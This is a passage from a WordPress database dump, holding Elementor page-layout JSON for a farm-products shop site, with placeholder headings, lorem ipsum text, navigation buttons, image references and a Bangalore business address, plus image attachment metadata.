Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7986,1418,'_elementor_page_assets','a:0:{}'),(7988,1419,'_elementor_edit_mode','builder'),(7989,1419,'_elementor_template_type','wp-page'),(7990,1419,'_elementor_version','3.7.6'),(7991,1419,'_wp_page_template','elementor_canvas'),(7992,1419,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7993,1419,'_elementor_page_assets','a:0:{}'),(7996,1339,'_wp_attachment_backup_sizes','a:8:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:625;s:6:\"height\";i:280;s:4:\"file\";s:50:\"cows-farming-on-green-meadow-260nw-1704884002.webp\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:58:\"cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4534;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:58:\"cows-farming-on-green-meadow-260nw-1704884002-300x134.webp\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6884;}s:26:\"woocommerce_thumbnail-orig\";a:6:{s:4:\"file\";s:58:\"cows-farming-on-green-meadow-260nw-1704884002-320x280.webp\";s:5:\"width\";i:320;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12362;s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:5:{s:4:\"file\";s:56:\"cows-farming-on-green-meadow-260nw-1704884002-50x22.webp\";s:5:\"width\";i:50;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:660;}s:34:\"woocommerce_gallery_thumbnail-orig\";a:5:{s:4:\"file\";s:58:\"cows-farming-on-green-meadow-260nw-1704884002-100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2802;}s:20:\"thaps-thumb-img-orig\";a:5:{s:4:\"file\";s:56:\"cows-farming-on-green-meadow-260nw-1704884002-48x22.webp\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:620;}s:21:\"taiowc-thumb-img-orig\";a:5:{s:4:\"file\";s:56:\"cows-farming-on-green-meadow-260nw-1704884002-48x22.webp\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:620;}}'),(8007,1421,'_elementor_edit_mode','builder'),(8008,1421,'_elementor_template_type','wp-page'),(8009,1421,'_elementor_version','3.7.6'),(8010,1421,'_wp_page_template','elementor_canvas'),(8011,1421,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 